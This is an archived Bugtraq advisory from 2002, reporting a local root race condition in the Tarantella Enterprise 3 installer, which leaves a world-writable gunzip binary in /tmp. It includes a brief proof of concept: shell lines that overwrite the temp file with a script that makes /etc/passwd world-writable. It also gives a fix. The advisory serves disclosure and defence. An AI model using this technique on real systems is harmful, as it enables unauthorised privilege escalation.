linux, säkerhet

7889939 2002-01-26 09:46 -0500  /74 rader/ Larry W. Cashdollar <lwc@vapid.dhs.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-27  00:15  av Brevbäraren
Extern mottagare: bugtraq@security-focus.com
Extern kopiemottagare: vulnwatch@vulnwatch.org
Mottagare: Bugtraq (import) <20697>
Kommentar till text 7885279 av KF <dotslash@snosoft.com>
Ärende: Vulnerability report for Tarantella Enterprise 3.
------------------------------------------------------------
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
To: <bugtraq@security-focus.com>
Cc: <vulnwatch@vulnwatch.org>
Message-ID: <20020126094434.S26298-100000@vapid.dhs.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

				Vapid Labs
			     Larry W. Cashdollar
			        1/14/2002

Vulnerability report for Tarantella Enterprise 3.

1. local root compromise during installation:

	The installation script provided with tarentella handles utility
packages during installation insecurely.   A root owned binary "gunzip"
is created in /tmp with world writeable permissions, the pid is appended
to the filename.


TMP_GUNZIP=$TMPDIR/gunzip$$

$ ls -l /tmp/gunzip16152
- -rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152

gunzip is extracted:
		    extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
		    extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

The permissions of gunzip are changed to rwx for all:
	    chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
	    extract $efilename | $TMP_GUNZIP -q > "$efilename"

2. Exploit:

There is a race condition between when gunzip is extracted and used
during installation.  At which time a malicious local user could
inject code to compromise the system quickly.

$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh

$ cat /tmp/test.sh > /tmp/gunzip16152

I was able to change the permissions of /etc/passwd to 777 by
performing the above as an unpriviledged user.

3. Recommendations:

Perhaps create a directory in /tmp or /var/tmp and use that directory
as a work place?

umask 077
mkdir /tmp/workdir

4. Software: Tarantella Enterprise 3

http://www.tarantella.com/download/e3/

Tested on Linux Debian 2.2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8QmV21hSQ6Gxh/KoRAhYIAJ0aDduF4k/fHV1O+24W8C6uNkokIwCgp2OL
gaJAw7urwOy0Ue03nEjlH2Q=
=TdDa
-----END PGP SIGNATURE-----
(7889939) /Larry W. Cashdollar <lwc@vapid.dhs.org>/(Ombruten)